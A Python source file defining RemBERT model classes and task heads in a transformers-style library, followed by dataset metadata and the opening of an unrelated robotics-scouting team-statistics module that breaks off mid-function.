self.decoder = nn.Linear(config.output_embedding_size, config.vocab_size)
self.activation = ACT2FN[config.hidden_act]
self.LayerNorm = nn.LayerNorm(config.output_embedding_size, eps=config.layer_norm_eps)
def forward(self, hidden_states):
hidden_states = self.dense(hidden_states)
hidden_states = self.activation(hidden_states)
hidden_states = self.LayerNorm(hidden_states)
hidden_states = self.decoder(hidden_states)
return hidden_states
# Copied from transformers.models.bert.modeling_bert.BertOnlyMLMHead with Bert->RemBert
class RemBertOnlyMLMHead(nn.Module):
def __init__(self, config):
super().__init__()
self.predictions = RemBertLMPredictionHead(config)
def forward(self, sequence_output):
prediction_scores = self.predictions(sequence_output)
return prediction_scores
class RemBertPreTrainedModel(PreTrainedModel):
"""
An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
models.
"""
config_class = RemBertConfig
load_tf_weights = load_tf_weights_in_rembert
base_model_prefix = "rembert"
_keys_to_ignore_on_load_missing = [r"position_ids"]
def _init_weights(self, module):
"""Initialize the weights"""
if isinstance(module, nn.Linear):
# Slightly different from the TF version which uses truncated_normal for initialization
# cf https://github.com/pytorch/pytorch/pull/5617
module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
if module.bias is not None:
module.bias.data.zero_()
elif isinstance(module, nn.Embedding):
module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
if module.padding_idx is not None:
module.weight.data[module.padding_idx].zero_()
elif isinstance(module, nn.LayerNorm):
module.bias.data.zero_()
module.weight.data.fill_(1.0)
REMBERT_START_DOCSTRING = r"""
This model is a PyTorch `torch.nn.Module <https://pytorch.org/docs/stable/nn.html#torch.nn.Module>`_ sub-class. Use
    it as a regular PyTorch Module and refer to the PyTorch documentation for all matters related to general usage and
behavior.
Parameters:
config (:class:`~transformers.RemBertConfig`): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the :meth:`~transformers.PreTrainedModel.from_pretrained` method to load the model
weights.
"""
REMBERT_INPUTS_DOCSTRING = r"""
Args:
input_ids (:obj:`torch.LongTensor` of shape :obj:`({0})`):
Indices of input sequence tokens in the vocabulary.
Indices can be obtained using :class:`transformers.RemBertTokenizer`. See
:func:`transformers.PreTrainedTokenizer.encode` and :func:`transformers.PreTrainedTokenizer.__call__` for
details.
`What are input IDs? <../glossary.html#input-ids>`__
attention_mask (:obj:`torch.FloatTensor` of shape :obj:`({0})`, `optional`):
Mask to avoid performing attention on padding token indices. Mask values selected in ``[0, 1]``:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
`What are attention masks? <../glossary.html#attention-mask>`__
token_type_ids (:obj:`torch.LongTensor` of shape :obj:`({0})`, `optional`):
Segment token indices to indicate first and second portions of the inputs. Indices are selected in ``[0,
1]``:
- 0 corresponds to a `sentence A` token,
- 1 corresponds to a `sentence B` token.
`What are token type IDs? <../glossary.html#token-type-ids>`_
position_ids (:obj:`torch.LongTensor` of shape :obj:`({0})`, `optional`):
Indices of positions of each input sequence tokens in the position embeddings. Selected in the range ``[0,
config.max_position_embeddings - 1]``.
`What are position IDs? <../glossary.html#position-ids>`_
head_mask (:obj:`torch.FloatTensor` of shape :obj:`(num_heads,)` or :obj:`(num_layers, num_heads)`, `optional`):
Mask to nullify selected heads of the self-attention modules. Mask values selected in ``[0, 1]``:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
inputs_embeds (:obj:`torch.FloatTensor` of shape :obj:`({0}, hidden_size)`, `optional`):
Optionally, instead of passing :obj:`input_ids` you can choose to directly pass an embedded representation.
This is useful if you want more control over how to convert `input_ids` indices into associated vectors
than the model's internal embedding lookup matrix.
output_attentions (:obj:`bool`, `optional`):
Whether or not to return the attentions tensors of all attention layers. See ``attentions`` under returned
tensors for more detail.
output_hidden_states (:obj:`bool`, `optional`):
Whether or not to return the hidden states of all layers. See ``hidden_states`` under returned tensors for
more detail.
return_dict (:obj:`bool`, `optional`):
Whether or not to return a :class:`~transformers.file_utils.ModelOutput` instead of a plain tuple.
"""
@add_start_docstrings(
"The bare RemBERT Model transformer outputting raw hidden-states without any specific head on top.",
REMBERT_START_DOCSTRING,
)
class RemBertModel(RemBertPreTrainedModel):
"""
The model can behave as an encoder (with only self-attention) as well as a decoder, in which case a layer of
cross-attention is added between the self-attention layers, following the architecture described in `Attention is
all you need <https://arxiv.org/abs/1706.03762>`__ by Ashish Vaswani, Noam Shazeer, Niki Parmar, Jakob Uszkoreit,
Llion Jones, Aidan N. Gomez, Lukasz Kaiser and Illia Polosukhin.
    To behave as a decoder the model needs to be initialized with the :obj:`is_decoder` argument of the configuration
    set to :obj:`True`. To be used in a Seq2Seq model, the model needs to be initialized with both :obj:`is_decoder`
argument and :obj:`add_cross_attention` set to :obj:`True`; an :obj:`encoder_hidden_states` is then expected as an
input to the forward pass.
"""
def __init__(self, config, add_pooling_layer=True):
super().__init__(config)
self.config = config
self.embeddings = RemBertEmbeddings(config)
self.encoder = RemBertEncoder(config)
self.pooler = RemBertPooler(config) if add_pooling_layer else None
self.init_weights()
def get_input_embeddings(self):
return self.embeddings.word_embeddings
def set_input_embeddings(self, value):
self.embeddings.word_embeddings = value
def _prune_heads(self, heads_to_prune):
"""
        Prunes heads of the model. heads_to_prune: dict of {layer_num: list of heads to prune in this layer}. See base
        class PreTrainedModel.
"""
for layer, heads in heads_to_prune.items():
self.encoder.layer[layer].attention.prune_heads(heads)
@add_start_docstrings_to_model_forward(REMBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@add_code_sample_docstrings(
tokenizer_class=_TOKENIZER_FOR_DOC,
checkpoint="rembert",
output_type=BaseModelOutputWithPastAndCrossAttentions,
config_class=_CONFIG_FOR_DOC,
)
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
past_key_values=None,
use_cache=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
encoder_hidden_states (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, hidden_size)`, `optional`):
Sequence of hidden-states at the output of the last layer of the encoder. Used in the cross-attention if
the model is configured as a decoder.
encoder_attention_mask (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Mask to avoid performing attention on the padding token indices of the encoder input. This mask is used in
the cross-attention if the model is configured as a decoder. Mask values selected in ``[0, 1]``:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
past_key_values (:obj:`tuple(tuple(torch.FloatTensor))` of length :obj:`config.n_layers` with each tuple having 4 tensors of shape :obj:`(batch_size, num_heads, sequence_length - 1, embed_size_per_head)`):
Contains precomputed key and value hidden states of the attention blocks. Can be used to speed up decoding.
If :obj:`past_key_values` are used, the user can optionally input only the last :obj:`decoder_input_ids`
(those that don't have their past key value states given to this model) of shape :obj:`(batch_size, 1)`
instead of all :obj:`decoder_input_ids` of shape :obj:`(batch_size, sequence_length)`.
use_cache (:obj:`bool`, `optional`):
If set to :obj:`True`, :obj:`past_key_values` key value states are returned and can be used to speed up
decoding (see :obj:`past_key_values`).
"""
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
if self.config.is_decoder:
use_cache = use_cache if use_cache is not None else self.config.use_cache
else:
use_cache = False
if input_ids is not None and inputs_embeds is not None:
raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time")
elif input_ids is not None:
input_shape = input_ids.size()
elif inputs_embeds is not None:
input_shape = inputs_embeds.size()[:-1]
else:
raise ValueError("You have to specify either input_ids or inputs_embeds")
batch_size, seq_length = input_shape
device = input_ids.device if input_ids is not None else inputs_embeds.device
# past_key_values_length
past_key_values_length = past_key_values[0][0].shape[2] if past_key_values is not None else 0
if attention_mask is None:
attention_mask = torch.ones(((batch_size, seq_length + past_key_values_length)), device=device)
if token_type_ids is None:
token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=device)
# We can provide a self-attention mask of dimensions [batch_size, from_seq_length, to_seq_length]
# ourselves in which case we just need to make it broadcastable to all heads.
extended_attention_mask: torch.Tensor = self.get_extended_attention_mask(attention_mask, input_shape, device)
# If a 2D or 3D attention mask is provided for the cross-attention
# we need to make broadcastable to [batch_size, num_heads, seq_length, seq_length]
if self.config.is_decoder and encoder_hidden_states is not None:
encoder_batch_size, encoder_sequence_length, _ = encoder_hidden_states.size()
encoder_hidden_shape = (encoder_batch_size, encoder_sequence_length)
if encoder_attention_mask is None:
encoder_attention_mask = torch.ones(encoder_hidden_shape, device=device)
encoder_extended_attention_mask = self.invert_attention_mask(encoder_attention_mask)
else:
encoder_extended_attention_mask = None
# Prepare head mask if needed
# 1.0 in head_mask indicate we keep the head
# attention_probs has shape bsz x n_heads x N x N
# input head_mask has shape [num_heads] or [num_hidden_layers x num_heads]
# and head_mask is converted to shape [num_hidden_layers x batch x num_heads x seq_length x seq_length]
head_mask = self.get_head_mask(head_mask, self.config.num_hidden_layers)
embedding_output = self.embeddings(
input_ids=input_ids,
position_ids=position_ids,
token_type_ids=token_type_ids,
inputs_embeds=inputs_embeds,
past_key_values_length=past_key_values_length,
)
encoder_outputs = self.encoder(
embedding_output,
attention_mask=extended_attention_mask,
head_mask=head_mask,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_extended_attention_mask,
past_key_values=past_key_values,
use_cache=use_cache,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
sequence_output = encoder_outputs[0]
pooled_output = self.pooler(sequence_output) if self.pooler is not None else None
if not return_dict:
return (sequence_output, pooled_output) + encoder_outputs[1:]
return BaseModelOutputWithPoolingAndCrossAttentions(
last_hidden_state=sequence_output,
pooler_output=pooled_output,
past_key_values=encoder_outputs.past_key_values,
hidden_states=encoder_outputs.hidden_states,
attentions=encoder_outputs.attentions,
cross_attentions=encoder_outputs.cross_attentions,
)
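# Hypothetical end-to-end usage of the bare model, in the spirit of the docstring
# example shown for RemBertForCausalLM below; it assumes the "google/rembert"
# checkpoint listed in REMBERT_PRETRAINED_MODEL_ARCHIVE_LIST is reachable and will
# download it on first use.
from transformers import RemBertModel, RemBertTokenizer
tokenizer = RemBertTokenizer.from_pretrained("google/rembert")
model = RemBertModel.from_pretrained("google/rembert")
inputs = tokenizer("Hello, my dog is cute", return_tensors="pt")
outputs = model(**inputs)
last_hidden_state = outputs.last_hidden_state  # (batch, seq_len, hidden_size)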
@add_start_docstrings("""RemBERT Model with a `language modeling` head on top. """, REMBERT_START_DOCSTRING)
class RemBertForMaskedLM(RemBertPreTrainedModel):
def __init__(self, config):
super().__init__(config)
if config.is_decoder:
logger.warning(
"If you want to use `RemBertForMaskedLM` make sure `config.is_decoder=False` for "
"bi-directional self-attention."
)
self.rembert = RemBertModel(config, add_pooling_layer=False)
self.cls = RemBertOnlyMLMHead(config)
self.init_weights()
def get_output_embeddings(self):
return self.cls.predictions.decoder
def set_output_embeddings(self, new_embeddings):
self.cls.predictions.decoder = new_embeddings
@add_start_docstrings_to_model_forward(REMBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@add_code_sample_docstrings(
tokenizer_class=_TOKENIZER_FOR_DOC,
checkpoint="rembert",
output_type=MaskedLMOutput,
config_class=_CONFIG_FOR_DOC,
)
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
labels=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Labels for computing the masked language modeling loss. Indices should be in ``[-100, 0, ...,
config.vocab_size]`` (see ``input_ids`` docstring) Tokens with indices set to ``-100`` are ignored
(masked), the loss is only computed for the tokens with labels in ``[0, ..., config.vocab_size]``.
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.rembert(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
sequence_output = outputs[0]
prediction_scores = self.cls(sequence_output)
masked_lm_loss = None
if labels is not None:
loss_fct = CrossEntropyLoss() # -100 index = padding token
masked_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), labels.view(-1))
if not return_dict:
output = (prediction_scores,) + outputs[2:]
return ((masked_lm_loss,) + output) if masked_lm_loss is not None else output
return MaskedLMOutput(
loss=masked_lm_loss,
logits=prediction_scores,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
def prepare_inputs_for_generation(self, input_ids, attention_mask=None, **model_kwargs):
input_shape = input_ids.shape
effective_batch_size = input_shape[0]
# add a dummy token
assert self.config.pad_token_id is not None, "The PAD token should be defined for generation"
attention_mask = torch.cat([attention_mask, attention_mask.new_zeros((attention_mask.shape[0], 1))], dim=-1)
dummy_token = torch.full(
(effective_batch_size, 1), self.config.pad_token_id, dtype=torch.long, device=input_ids.device
)
input_ids = torch.cat([input_ids, dummy_token], dim=1)
return {"input_ids": input_ids, "attention_mask": attention_mask}
@add_start_docstrings(
"""RemBERT Model with a `language modeling` head on top for CLM fine-tuning. """, REMBERT_START_DOCSTRING
)
class RemBertForCausalLM(RemBertPreTrainedModel):
_keys_to_ignore_on_load_missing = [r"position_ids", r"predictions.decoder.bias"]
def __init__(self, config):
super().__init__(config)
if not config.is_decoder:
logger.warning("If you want to use `RemBertForCausalLM` as a standalone, add `is_decoder=True.`")
self.rembert = RemBertModel(config, add_pooling_layer=False)
self.cls = RemBertOnlyMLMHead(config)
self.init_weights()
def get_output_embeddings(self):
return self.cls.predictions.decoder
def set_output_embeddings(self, new_embeddings):
self.cls.predictions.decoder = new_embeddings
@add_start_docstrings_to_model_forward(REMBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@replace_return_docstrings(output_type=CausalLMOutputWithCrossAttentions, config_class=_CONFIG_FOR_DOC)
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
past_key_values=None,
labels=None,
use_cache=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
encoder_hidden_states (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, hidden_size)`, `optional`):
Sequence of hidden-states at the output of the last layer of the encoder. Used in the cross-attention if
the model is configured as a decoder.
encoder_attention_mask (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Mask to avoid performing attention on the padding token indices of the encoder input. This mask is used in
the cross-attention if the model is configured as a decoder. Mask values selected in ``[0, 1]``:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
past_key_values (:obj:`tuple(tuple(torch.FloatTensor))` of length :obj:`config.n_layers` with each tuple having 4 tensors of shape :obj:`(batch_size, num_heads, sequence_length - 1, embed_size_per_head)`):
Contains precomputed key and value hidden states of the attention blocks. Can be used to speed up decoding.
If :obj:`past_key_values` are used, the user can optionally input only the last :obj:`decoder_input_ids`
(those that don't have their past key value states given to this model) of shape :obj:`(batch_size, 1)`
instead of all :obj:`decoder_input_ids` of shape :obj:`(batch_size, sequence_length)`.
labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Labels for computing the left-to-right language modeling loss (next word prediction). Indices should be in
``[-100, 0, ..., config.vocab_size]`` (see ``input_ids`` docstring) Tokens with indices set to ``-100`` are
            ignored (masked), the loss is only computed for the tokens with labels in ``[0, ..., config.vocab_size]``.
use_cache (:obj:`bool`, `optional`):
If set to :obj:`True`, :obj:`past_key_values` key value states are returned and can be used to speed up
decoding (see :obj:`past_key_values`).
Returns:
Example::
>>> from transformers import RemBertTokenizer, RemBertForCausalLM, RemBertConfig
>>> import torch
>>> tokenizer = RemBertTokenizer.from_pretrained('rembert')
>>> config = RemBertConfig.from_pretrained("rembert")
>>> config.is_decoder = True
>>> model = RemBertForCausalLM.from_pretrained('rembert', config=config)
>>> inputs = tokenizer("Hello, my dog is cute", return_tensors="pt")
>>> outputs = model(**inputs)
>>> prediction_logits = outputs.logits
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.rembert(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
past_key_values=past_key_values,
use_cache=use_cache,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
sequence_output = outputs[0]
prediction_scores = self.cls(sequence_output)
lm_loss = None
if labels is not None:
# we are doing next-token prediction; shift prediction scores and input ids by one
shifted_prediction_scores = prediction_scores[:, :-1, :].contiguous()
labels = labels[:, 1:].contiguous()
loss_fct = CrossEntropyLoss()
lm_loss = loss_fct(shifted_prediction_scores.view(-1, self.config.vocab_size), labels.view(-1))
if not return_dict:
output = (prediction_scores,) + outputs[2:]
return ((lm_loss,) + output) if lm_loss is not None else output
return CausalLMOutputWithCrossAttentions(
loss=lm_loss,
logits=prediction_scores,
past_key_values=outputs.past_key_values,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
cross_attentions=outputs.cross_attentions,
)
def prepare_inputs_for_generation(self, input_ids, past=None, attention_mask=None, **model_kwargs):
input_shape = input_ids.shape
# if model is used as a decoder in encoder-decoder model, the decoder attention mask is created on the fly
if attention_mask is None:
attention_mask = input_ids.new_ones(input_shape)
# cut decoder_input_ids if past is used
if past is not None:
input_ids = input_ids[:, -1:]
return {"input_ids": input_ids, "attention_mask": attention_mask, "past_key_values": past}
def _reorder_cache(self, past, beam_idx):
reordered_past = ()
for layer_past in past:
reordered_past += (
tuple(past_state.index_select(0, beam_idx) for past_state in layer_past[:2]) + layer_past[2:],
)
return reordered_past
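# Small illustration of the cache reordering above: index_select(0, beam_idx) reorders
# the beam dimension of each cached key/value tensor so the cache stays aligned with
# the beams selected at the current generation step.
import torch
past_state = torch.tensor([[0.0], [1.0], [2.0]])  # three beams, one cached value each
beam_idx = torch.tensor([2, 0, 0])  # new beam 0 comes from old beam 2, beams 1-2 from old beam 0
reordered = past_state.index_select(0, beam_idx)
assert reordered.tolist() == [[2.0], [0.0], [0.0]]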
@add_start_docstrings(
"""
RemBERT Model transformer with a sequence classification/regression head on top (a linear layer on top of the
pooled output) e.g. for GLUE tasks.
""",
REMBERT_START_DOCSTRING,
)
class RemBertForSequenceClassification(RemBertPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.num_labels = config.num_labels
self.rembert = RemBertModel(config)
self.dropout = nn.Dropout(config.classifier_dropout_prob)
self.classifier = nn.Linear(config.hidden_size, config.num_labels)
self.init_weights()
@add_start_docstrings_to_model_forward(REMBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@add_code_sample_docstrings(
tokenizer_class=_TOKENIZER_FOR_DOC,
checkpoint="rembert",
output_type=SequenceClassifierOutput,
config_class=_CONFIG_FOR_DOC,
)
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
labels=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`):
Labels for computing the sequence classification/regression loss. Indices should be in :obj:`[0, ...,
            config.num_labels - 1]`. If :obj:`config.num_labels == 1` a regression loss is computed (Mean-Square loss).
If :obj:`config.num_labels > 1` a classification loss is computed (Cross-Entropy).
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.rembert(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
pooled_output = outputs[1]
pooled_output = self.dropout(pooled_output)
logits = self.classifier(pooled_output)
loss = None
if labels is not None:
if self.num_labels == 1:
# We are doing regression
loss_fct = MSELoss()
loss = loss_fct(logits.view(-1), labels.view(-1))
else:
loss_fct = CrossEntropyLoss()
loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
if not return_dict:
output = (logits,) + outputs[2:]
return ((loss,) + output) if loss is not None else output
return SequenceClassifierOutput(
loss=loss,
logits=logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
@add_start_docstrings(
"""
RemBERT Model with a multiple choice classification head on top (a linear layer on top of the pooled output and a
softmax) e.g. for RocStories/SWAG tasks.
""",
REMBERT_START_DOCSTRING,
)
class RemBertForMultipleChoice(RemBertPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.rembert = RemBertModel(config)
self.dropout = nn.Dropout(config.classifier_dropout_prob)
self.classifier = nn.Linear(config.hidden_size, 1)
self.init_weights()
@add_start_docstrings_to_model_forward(REMBERT_INPUTS_DOCSTRING.format("batch_size, num_choices, sequence_length"))
@add_code_sample_docstrings(
tokenizer_class=_TOKENIZER_FOR_DOC,
checkpoint="rembert",
output_type=MultipleChoiceModelOutput,
config_class=_CONFIG_FOR_DOC,
)
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
labels=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`):
Labels for computing the multiple choice classification loss. Indices should be in ``[0, ...,
num_choices-1]`` where :obj:`num_choices` is the size of the second dimension of the input tensors. (See
:obj:`input_ids` above)
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
num_choices = input_ids.shape[1] if input_ids is not None else inputs_embeds.shape[1]
input_ids = input_ids.view(-1, input_ids.size(-1)) if input_ids is not None else None
attention_mask = attention_mask.view(-1, attention_mask.size(-1)) if attention_mask is not None else None
token_type_ids = token_type_ids.view(-1, token_type_ids.size(-1)) if token_type_ids is not None else None
position_ids = position_ids.view(-1, position_ids.size(-1)) if position_ids is not None else None
inputs_embeds = (
inputs_embeds.view(-1, inputs_embeds.size(-2), inputs_embeds.size(-1))
if inputs_embeds is not None
else None
)
outputs = self.rembert(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
pooled_output = outputs[1]
pooled_output = self.dropout(pooled_output)
logits = self.classifier(pooled_output)
reshaped_logits = logits.view(-1, num_choices)
loss = None
if labels is not None:
loss_fct = CrossEntropyLoss()
loss = loss_fct(reshaped_logits, labels)
if not return_dict:
output = (reshaped_logits,) + outputs[2:]
return ((loss,) + output) if loss is not None else output
return MultipleChoiceModelOutput(
loss=loss,
logits=reshaped_logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
@add_start_docstrings(
"""
RemBERT Model with a token classification head on top (a linear layer on top of the hidden-states output) e.g. for
Named-Entity-Recognition (NER) tasks.
""",
REMBERT_START_DOCSTRING,
)
class RemBertForTokenClassification(RemBertPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.num_labels = config.num_labels
self.rembert = RemBertModel(config, add_pooling_layer=False)
self.dropout = nn.Dropout(config.classifier_dropout_prob)
self.classifier = nn.Linear(config.hidden_size, config.num_labels)
self.init_weights()
@add_start_docstrings_to_model_forward(REMBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@add_code_sample_docstrings(
tokenizer_class=_TOKENIZER_FOR_DOC,
checkpoint="rembert",
output_type=TokenClassifierOutput,
config_class=_CONFIG_FOR_DOC,
)
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
labels=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Labels for computing the token classification loss. Indices should be in ``[0, ..., config.num_labels -
1]``.
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.rembert(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
sequence_output = outputs[0]
sequence_output = self.dropout(sequence_output)
logits = self.classifier(sequence_output)
loss = None
if labels is not None:
loss_fct = CrossEntropyLoss()
# Only keep active parts of the loss
if attention_mask is not None:
active_loss = attention_mask.view(-1) == 1
active_logits = logits.view(-1, self.num_labels)
active_labels = torch.where(
active_loss, labels.view(-1), torch.tensor(loss_fct.ignore_index).type_as(labels)
)
loss = loss_fct(active_logits, active_labels)
else:
loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
if not return_dict:
output = (logits,) + outputs[2:]
return ((loss,) + output) if loss is not None else output
return TokenClassifierOutput(
loss=loss,
logits=logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
@add_start_docstrings(
"""
RemBERT Model with a span classification head on top for extractive question-answering tasks like SQuAD (a linear
layers on top of the hidden-states output to compute `span start logits` and `span end logits`).
""",
REMBERT_START_DOCSTRING,
)
class RemBertForQuestionAnswering(RemBertPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.num_labels = config.num_labels
self.rembert = RemBertModel(config, add_pooling_layer=False)
self.qa_outputs = nn.Linear(config.hidden_size, config.num_labels)
self.init_weights()
@add_start_docstrings_to_model_forward(REMBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@add_code_sample_docstrings(
tokenizer_class=_TOKENIZER_FOR_DOC,
checkpoint="rembert",
output_type=QuestionAnsweringModelOutput,
config_class=_CONFIG_FOR_DOC,
)
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
start_positions=None,
end_positions=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
start_positions (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`):
Labels for position (index) of the start of the labelled span for computing the token classification loss.
            Positions are clamped to the length of the sequence (:obj:`sequence_length`). Positions outside of the
sequence are not taken into account for computing the loss.
end_positions (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`):
Labels for position (index) of the end of the labelled span for computing the token classification loss.
            Positions are clamped to the length of the sequence (:obj:`sequence_length`). Positions outside of the
sequence are not taken into account for computing the loss.
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.rembert(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
sequence_output = outputs[0]
logits = self.qa_outputs(sequence_output)
start_logits, end_logits = logits.split(1, dim=-1)
start_logits = start_logits.squeeze(-1)
end_logits = end_logits.squeeze(-1)
total_loss = None
if start_positions is not None and end_positions is not None:
# If we are on multi-GPU, split add a dimension
if len(start_positions.size()) > 1:
start_positions = start_positions.squeeze(-1)
if len(end_positions.size()) > 1:
end_positions = end_positions.squeeze(-1)
            # Sometimes the start/end positions are outside our model inputs; we ignore these terms.
ignored_index = start_logits.size(1)
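            # Clamping to the sequence length makes out-of-range targets equal to ignore_index, so the loss skips them.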
start_positions.clamp_(0, ignored_index)
end_positions.clamp_(0, ignored_index)
loss_fct = CrossEntropyLoss(ignore_index=ignored_index)
start_loss = loss_fct(start_logits, start_positions)
end_loss = loss_fct(end_logits, end_positions)
total_loss = (start_loss + end_loss) / 2
if not return_dict:
output = (start_logits, end_logits) + outputs[2:]
return ((total_loss,) + output) if total_loss is not None else output
return QuestionAnsweringModelOutput(
loss=total_loss,
start_logits=start_logits,
end_logits=end_logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
| 42.220608
| 213
| 0.662104
|
42041a8c8316b637a72c75b8f8f50f9fcd597576
| 5,853
|
py
|
Python
|
src/calculations/obj_team.py
|
frc1678/server-2021-public
|
d61e35f8385bf1debc9daaaed40208f6c783ed77
|
[
"MIT"
] | null | null | null |
src/calculations/obj_team.py
|
frc1678/server-2021-public
|
d61e35f8385bf1debc9daaaed40208f6c783ed77
|
[
"MIT"
] | null | null | null |
src/calculations/obj_team.py
|
frc1678/server-2021-public
|
d61e35f8385bf1debc9daaaed40208f6c783ed77
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
"""Calculate objective team data from Team in Match (TIM) data."""
import utils
from typing import List, Dict
from calculations import base_calculations
from statistics import pstdev
class OBJTeamCalc(base_calculations.BaseCalculations):
"""Runs OBJ Team calculations"""
# Get the last section of each entry (so foo.bar.baz becomes baz)
SCHEMA = utils.unprefix_schema_dict(utils.read_schema('schema/calc_obj_team_schema.yml'))
def __init__(self, server):
"""Overrides watched collections, passes server object"""
super().__init__(server)
self.watched_collections = ['obj_tim']
def get_action_counts(self, tims: List[Dict]):
"""Gets a list of times each team completed a certain action by tim for averages
and standard deviations.
"""
tim_action_counts = {}
# Gathers all necessary schema fields
tim_fields = set()
for schema in {**self.SCHEMA['averages'], **self.SCHEMA['standard_deviations']}.values():
tim_fields.add(schema['tim_fields'][0])
for tim_field in tim_fields:
# Gets the total number of actions across all tims
